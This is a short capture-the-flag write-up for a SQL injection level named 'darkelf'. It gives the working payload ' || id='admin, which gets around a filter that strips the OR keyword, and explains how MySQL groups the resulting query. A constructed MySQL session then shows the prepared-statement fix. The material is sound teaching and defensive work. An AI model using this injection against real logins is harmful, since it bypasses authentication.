
darkelf


We are provided with the SQL query:

SELECT id FROM prob_darkelf WHERE id='guest' AND pw='{$_GET[pw]}'

This level prints out the flag if the id is admin.

However, it also removes the OR characters. To get around this, we need to use the double pipe (||) operator, which MySQL in its default SQL mode treats as a logical OR.

If we provide the following URI parameter:

?pw=' || id='admin

The resultant query becomes:

SELECT id FROM prob_darkelf WHERE id='guest' AND pw='' || id='admin'
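
The following MySQL session is an added example, not part of the original challenge or writeup. It shows how the resultant query is grouped and how the same input behaves once it is bound as a parameter. It assumes a default sql_mode (PIPES_AS_CONCAT not set); the table layout, the two password values and the statement name find_user are constructed for illustration.

```sql
-- Constructed stand-in for the challenge table; column types are assumptions.
CREATE TEMPORARY TABLE prob_darkelf (id VARCHAR(16), pw VARCHAR(64));
INSERT INTO prob_darkelf (id, pw) VALUES
  ('guest', 'guest-password'),   -- constructed value
  ('admin', 'admin-password');   -- constructed value

-- The query from the page after the pw parameter is interpolated into the string.
SELECT id FROM prob_darkelf WHERE id='guest' AND pw='' || id='admin';

-- AND binds tighter than || (OR), so MySQL groups the WHERE clause like this.
-- The right-hand branch is true for the admin row whatever its password is,
-- which is why filtering only the keyword OR does not protect the query.
SELECT id FROM prob_darkelf WHERE (id='guest' AND pw='') OR id='admin';

-- Hardened form: the statement text is fixed and pw is supplied as a bound value.
PREPARE find_user FROM
  'SELECT id FROM prob_darkelf WHERE id=''guest'' AND pw=?';

-- Same input as on the page. Bound as data, the whole string is compared with
-- the pw column, so the quote and the || are never parsed as SQL.
SET @pw = ''' || id=''admin';
EXECUTE find_user USING @pw;

-- A correct password still matches through the same statement.
SET @pw = 'guest-password';
EXECUTE find_user USING @pw;

DEALLOCATE PREPARE find_user;
DROP TEMPORARY TABLE prob_darkelf;
```

In application code the equivalent fix is a prepared statement with a bound parameter in place of the interpolated `{$_GET[pw]}`.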
